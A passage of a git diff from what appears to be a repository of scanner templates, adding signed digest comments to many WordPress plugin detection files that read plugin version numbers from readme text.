b/http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a004830460221009e5d5a4fda900f44f5eea40711d1101d6a9c17d888d636f22d05dac17bd0df0f02210083672987cf3308dac6bc2fa28cc35a9e4a24d78524d23291098542b919bd0c45:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cmb2.yaml b/http/technologies/wordpress/plugins/cmb2.yaml index c3b630cde2..a8200bbccc 100644 --- a/http/technologies/wordpress/plugins/cmb2.yaml +++ b/http/technologies/wordpress/plugins/cmb2.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202d3875de519dcb1af43843ed9ad690f7628abdd35f06d714d6593520499257cb022100d21163fb7d822be5752532bb33d2c6178e9333ef44043f756a8a3bffe09a051c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coblocks.yaml b/http/technologies/wordpress/plugins/coblocks.yaml index 5c8ce709b6..2d82a476db 100644 --- a/http/technologies/wordpress/plugins/coblocks.yaml +++ b/http/technologies/wordpress/plugins/coblocks.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022012a771fbe75ecfbed562373413d3c5e1a34b4658ca5d0d81eb944e6bfa4048060220260f7eee3c535fb57788d8f7f5b1d6f089aad99393ae61c36cc9d6928c074cb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/code-snippets.yaml b/http/technologies/wordpress/plugins/code-snippets.yaml index aea47b9e84..447987d547 100644 --- a/http/technologies/wordpress/plugins/code-snippets.yaml +++ b/http/technologies/wordpress/plugins/code-snippets.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5cd7a36081b4021c1417a4fcae3c17a4814396a1818e56d022354ca957d62a102210082dbd04bbeb542fa6fbe33f29be99c75e8542da81c4632a4ef9913710ab3a823:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/coming-soon.yaml b/http/technologies/wordpress/plugins/coming-soon.yaml index 78c584c388..a7dae1f4fd 100644 --- a/http/technologies/wordpress/plugins/coming-soon.yaml +++ b/http/technologies/wordpress/plugins/coming-soon.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207f7b364303cc1c412bcdc775149305ab446a01b406de392df65fe0b8a6621e2702206731b35b9265dc8e96ed99f25b356a556e95cfde6bcd0c073fb0fb81d9ac20b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/complianz-gdpr.yaml b/http/technologies/wordpress/plugins/complianz-gdpr.yaml index 2c80d09c27..84c5b0ad00 100644 --- a/http/technologies/wordpress/plugins/complianz-gdpr.yaml +++ b/http/technologies/wordpress/plugins/complianz-gdpr.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205f18fb63c091ad717eaaaa3abaaa56949b1840637fc4f6a72e57af81baecdeee022100e3233ec816a48c6d1b72229585ad8cb9485837d1e50a0b815d76606f8b6da3d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml index 4b1b3a8754..4dd4004d0c 100644 --- a/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e552b30dc45ab03f8ff8bb513bb75939198c9c47fc7b719bc823386b90d3959102204eb278b4aafbd9a6b7771a923e5a0026172f1bfbce2bbcd46abd16e4bf93c9e8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-7.yaml b/http/technologies/wordpress/plugins/contact-form-7.yaml index 06ad83bdf7..29b43248d0 100644 --- a/http/technologies/wordpress/plugins/contact-form-7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502201d4e9d4f412666d0d435c4eecc09e3da7a2b14970b478dff444b34317f0e304002210099133864b533055dcf9829e3aa7471e27b639c92fd84a1bbe35b6ffcb61a9ea2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml index b20666268f..cc02142a3b 100644 --- a/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml +++ b/http/technologies/wordpress/plugins/contact-form-cfdb7.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c4e5a1c3c089fccb91a553d40a59ccb4ee9e46b271e962dbd733fec6e056ddb02200e56dedb98e908503f8a80e2eda83220f7d430beaca6f21613fce9730e246405:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-law-info.yaml b/http/technologies/wordpress/plugins/cookie-law-info.yaml index b2a097bfe7..2fabefd41f 100644 --- a/http/technologies/wordpress/plugins/cookie-law-info.yaml +++ b/http/technologies/wordpress/plugins/cookie-law-info.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210081c1d7523b7068173e5305c6cc5f1d2fbf653c48746258493fe6347892bd9f3c0221008b54d6e99c7cef1061fdce38c61c9204a49b3e54b09353175000c10e312331ec:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/cookie-notice.yaml b/http/technologies/wordpress/plugins/cookie-notice.yaml index c71fa258af..eca2fd6f90 100644 --- a/http/technologies/wordpress/plugins/cookie-notice.yaml +++ b/http/technologies/wordpress/plugins/cookie-notice.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502205c2591f7f54a86e06a1ed8b06e00e6680e968027015d2582a6fa4119c9ae6a5a022100e203276eb8fc24fa62b04f867487e0d74982c8ce676af7ca87f353baf09fdd29:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml index 5a98e67597..87b21676d0 100644 --- a/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml +++ b/http/technologies/wordpress/plugins/creame-whatsapp-me.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c5d239fd8a57406f52a1ce990a872d11d561ff990846ce3134359ac8af7fefeb022100a8040c957a0c5565c09ccbd4bf082f75c5c2f65b93f79dbded883d4aa82011c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml index 4463174203..b02a018e5e 100644 --- a/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml +++ b/http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100fa48c1c7493f0ae1d898b1b27d9aa511452086a8341d26e25ddf8cccd614eaad022017efb9468118a567b0b14007098585c888653cd8bf52d7df9a8c65b368e79286:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-css-js.yaml b/http/technologies/wordpress/plugins/custom-css-js.yaml index cfac0b961b..159c97d39a 100644 --- a/http/technologies/wordpress/plugins/custom-css-js.yaml +++ b/http/technologies/wordpress/plugins/custom-css-js.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221008329befa72cac3d2ed932242a20827d01373a3fa9591c4d35e7ae149badd2cc0022020b18f02212dfc4850d7212358ec91d01a3bc921a6e1d51601d31eb43f660abc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-fonts.yaml b/http/technologies/wordpress/plugins/custom-fonts.yaml index 846761f2f7..a9b10c60c4 100644 --- a/http/technologies/wordpress/plugins/custom-fonts.yaml +++ b/http/technologies/wordpress/plugins/custom-fonts.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220289f0dab3ee5cedbc60ce7ff276558b78ede7faab53e33b3943d2144e11e4e130220489634c10d55f70b0250fdfc84995e4d2724bd8c3dc0c9716eb22d551c502e15:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml index 0def6e61ca..dd35a47625 100644 --- a/http/technologies/wordpress/plugins/custom-post-type-ui.yaml +++ b/http/technologies/wordpress/plugins/custom-post-type-ui.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220295bcb7504a30dfbc85d0f0fad5af53ccbb1a2ef852d16a5523d9ec0192c5d2402207b719acef31a8cc940bb2f6ca05695e28f14a876c138abcf86cc7fdee7190ff8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-comments.yaml b/http/technologies/wordpress/plugins/disable-comments.yaml index 5c5decc127..58319f5782 100644 --- a/http/technologies/wordpress/plugins/disable-comments.yaml +++ b/http/technologies/wordpress/plugins/disable-comments.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a5bbc8f81ec077da1169307f04d11332d3e50549275766eaf31a78fa7265b1f70221009370bb8e9e830666c96ece74a6c8044aa4c59fd301093b8812442652e4066b27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/disable-gutenberg.yaml b/http/technologies/wordpress/plugins/disable-gutenberg.yaml index a8229a338e..1ff35d6b2f 100644 --- a/http/technologies/wordpress/plugins/disable-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/disable-gutenberg.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a46a58b97d68e80f1c576fbcba884aba89ac2a74be009275e52bcd827c72c033022100e9f8ee43ab4c5090288b94d1a131c3a4e694410b2dba26dc3d74a6c07a668a14:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-page.yaml b/http/technologies/wordpress/plugins/duplicate-page.yaml index 6559e64dce..70b304598a 100644 --- a/http/technologies/wordpress/plugins/duplicate-page.yaml +++ b/http/technologies/wordpress/plugins/duplicate-page.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220457192ef200e7331664554f7e071b74d203cd7d98284934b8393711dea969ad40220059905cb12ebc88ec4eaddb5d160d943d8990e2030f02a52d7bc984a89ddf182:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicate-post.yaml b/http/technologies/wordpress/plugins/duplicate-post.yaml index a4368b8aa6..220bd8a8cb 100644 --- a/http/technologies/wordpress/plugins/duplicate-post.yaml +++ b/http/technologies/wordpress/plugins/duplicate-post.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022039302ad029bf5a1b0fe26044b91c634f228b10569b8da8682256400b4285644a02205f228bd0531741fbbcc22a1c48aa73272b54e288c9c85cf7bdfe5b4a9ac6f1bf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duplicator.yaml b/http/technologies/wordpress/plugins/duplicator.yaml index ec119e762a..f560de805a 100644 --- a/http/technologies/wordpress/plugins/duplicator.yaml +++ b/http/technologies/wordpress/plugins/duplicator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd14b52f925105d1a3b208fb725e8f8da596f8360ddbe9790bb987b340fba730022100b111dd8a4c58f1a2bf3cbad3d75e7a811e1a3e239c92522ccf8d77e5f4792896:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml index b7ec7576a3..b297de24db 100644 --- a/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml +++ b/http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d141a6ed28fe563c0e1de541a91d7fc79febfcd2f89a7bf805234be9db9b1055022100d4b97e9979efd60ccd441be3ad6f548487f4058b59368d2298777ae1283f4767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-fancybox.yaml b/http/technologies/wordpress/plugins/easy-fancybox.yaml index c42d679973..258a7e5ef5 100644 --- a/http/technologies/wordpress/plugins/easy-fancybox.yaml +++ b/http/technologies/wordpress/plugins/easy-fancybox.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100fdfe55fbb0593d836745e87924f33232d1eb6c7927c404f0dd44317d0c98bec5022100c6237c28bfd066c6f309c031aa1d24cf411b59832211c31fb0d4405f2c7674e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml index fc44375947..ee9d39ee60 100644 --- a/http/technologies/wordpress/plugins/easy-table-of-contents.yaml +++ b/http/technologies/wordpress/plugins/easy-table-of-contents.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d95964151d65496645482ea24acc006f0bc591cc55f57faf367ca2b95b9cdb80022100bc357eb9a2b54ec1a037c42ac56832b61f7fcd7703ead3cb293389230b66f9bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml index a1616c1741..f806930942 100644 --- a/http/technologies/wordpress/plugins/easy-wp-smtp.yaml +++ b/http/technologies/wordpress/plugins/easy-wp-smtp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100a4f2064aac01e3e9a20fe7b66fc8837720fa8f7a70c65e3e913e9573175051a602207250c58cd5edf3f6ba5e2b2b76a02f4b6bd5a36d051e7df6775479a0317888c3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementor.yaml b/http/technologies/wordpress/plugins/elementor.yaml index 6cfb8bc272..2318662171 100644 --- a/http/technologies/wordpress/plugins/elementor.yaml +++ b/http/technologies/wordpress/plugins/elementor.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c208d56b33b7418a5cb610bd31d48a9a7859017b00b54074e96082b3742bc3a8022100fdbb2ebe3eef918459432c8deac29f413797e477939b965041f3d4cc3b58d767:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/elementskit-lite.yaml b/http/technologies/wordpress/plugins/elementskit-lite.yaml index 9caaa53263..b5ce8d19dc 100644 --- a/http/technologies/wordpress/plugins/elementskit-lite.yaml +++ b/http/technologies/wordpress/plugins/elementskit-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207b0751725beb69c945a3e2b60648d2df2dc13527a68318da0be4861a7b3a19ab022010d4edb82e177162c4d436677b0842fba72c1022dd4e911e03817a4c11d82aa0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/enable-media-replace.yaml b/http/technologies/wordpress/plugins/enable-media-replace.yaml index 5e6b557952..be93b75726 100644 --- a/http/technologies/wordpress/plugins/enable-media-replace.yaml +++ b/http/technologies/wordpress/plugins/enable-media-replace.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220339c01997159cbf93e95da26a6c5937c60f3d453348fefc249f00b5deec3a9f9022100c960e57b20f2b14e654a0e801bc5ca1bfcb2e8a314cde65f2e6f3fefb12754c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/envato-elements.yaml b/http/technologies/wordpress/plugins/envato-elements.yaml index c5a665e6f7..b22af4007f 100644 --- a/http/technologies/wordpress/plugins/envato-elements.yaml +++ b/http/technologies/wordpress/plugins/envato-elements.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220037d8b03ae73936f26b3f9f020ff27fa2900b9b04024ed88eed27a4222a3845e022100a610250411056c84544bee780a0d21c4f9e04ba2fe60cbf0dd9dd71994ca983b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml index a8b56b5df0..21aed541b0 100644 --- a/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml +++ b/http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022058de2ffc84aa0c8c82094246cc7e2916e8779bee59e44c65b28074b6dc102cde02205f87a5c49fbf761c92e38e55f0299a7403953ecaaf7d2ce36838db19dffcc691:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml index 4e20e57107..c15b80d531 100644 --- a/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml +++ b/http/technologies/wordpress/plugins/ewww-image-optimizer.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201b49b8a5fd4e6c86d682711b2a98087c17f456e476bc737b9206d218b6c7cec50220396463b85bd804031ebe4502bb1382e8a4fbafebf5bfad3cf5bf2379bf682a92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml index 6f6a416595..1734030b69 100644 --- a/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100dad68e0d5e49d96549b3255ce97bfbbe110474dfd48923a16c414e0893e02804022100854515088550000f9f4b26bf21070bc3d8eff83fea28e7ede5f37f3b8bff3130:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index 2dd0ef57b5..1f78e60c6a 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100abd0a6371959f3883ff4b225ec83dc028b8051ab7bedcb85ec23482f03bfec03022070aa50f3b09773ab76bfe5ed661838d8ff1b69d578d0d8df6cfbfa861a6f5780:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 11942f4fa4..d34374a683 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210093168193fc98c11adcc3038a7ea53aeb8173e8c778f67583fcb25b247cea66910220136ab57b43d287c421e4083574c003159406e55a77051f7ffc804b5d0c136d1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index 87c2aeb4bd..bb758dbed1 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100cee96332eaf921af6ffe00b19eff089cdc36e4e9c083c2891d00c6ed29f420a3022039b024281837a5b63e234c2d4b29f805b617cdcbcf859d2d77027fe1d9b7de04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 3696eefbf7..0017d2a7af 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204c816523829afe97b1edf8874a170c5967133ee022da9a5e0ca167f5f2a319d90220013bb0fb88134fccb43e1a0e67154781c8de4d3e37609245a98c0f8917696d21:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 8bab0a9c3e..881f5676df 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d51acd82ec0a9c1e66e7911d874453e66e630c6d3b7f76dc431af56132cd3eb8022100f6627220b9c64b6d1478bc39da8895c4ee7c260a862fad30877fe94c1d786690:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index affd270123..517782c5a6 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5a3387ce34f9b7c930e84ea718ff59b3fb544f8db3b47a4bb60255f6c996d5d022030989881a503f8dafd5ff164dfcc2d984c42a7e729e7d204d0d98b47f4a01af0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 4ba4fbeff4..bc162a8e9c 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100dbce6f65da66c8559f0dc64194c62caa4fe5376a60f75e8ad95a95cf4787703e02206abacee801776c294c37d8f1463f1285eeab3b61934b1b36e51533e31fe704b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index 980265f531..7b0bee1421 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e3dd3182876e7287b47755ba9fa5097a2a5f5a5c105355ae5fa0fae1d0e55cce02210099382ae4c59ccce33e83c6208c6e42bbd154b45ddaee6627940672547bee3b94:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index daf205789d..9c1d574344 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d5160a1181f37283eaa6d055a062352688c90fdad88148faab1bab9b2c093adf022028e868c20adad0a5bb2fabd10ed3cf48cb77cb5b6a4b70eb1a7313658a6ba6cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 22bfa3ffe2..00087a52eb 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402204a3a8656b814f7ca676cafc368086e7b3fafa08deeb10f61d64bbd3053471f0a02205c35ab772e6d0e5f6a233cf1f7156dded8dab29f1fffbcc282d35517e6ca907f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 7ed171d662..3e9428ee18 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022047ab98e1d28c9016fba32e86889bcecb430714afaa97eb0789a58f36a5b6ec5002203377a9ecadaee18d59ca8ca7baa3ff88ffcf7390828352d07300b54a7be279db:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index ad238445fc..2770ac5be0 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b74e053436e1490e5bc59f788c85d548b8230b36a74c8bfec3d0df85a9756ffe022100c03ebeac7033ce5980b5bdd574e485ec9f5743de9ec602a96faba7eb6db2e67b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 7161671960..3cbacec89e 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c7c659e7885e1b793bdcee8651507fd16a796e400646036aee5e64573814eb63022100c8232777c1a58eda5dbe88610a9696a5d7e03221d3ab52c5951f15756835d155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index 2678f603c6..2a77c35daa 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a0048304602210084783c3e125824e7788a7a665b8985474c626448d8a88a8d3b8d46aec478eff8022100e24b5264e1392a8a01dd15fe9b88b77d94cf6696846635e35818de99ceb9ed04:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 20d947a5d1..ea387fc8ce 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -47,3 +47,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220403d2d8b1dd9064e9c00fd5fe317032f99899d61bd3d41c53379d05ab8c6f714022100d3c30ec0f7ea076bfb9d262ffb32228e3806923653dccd5a07275e96583ee2eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml 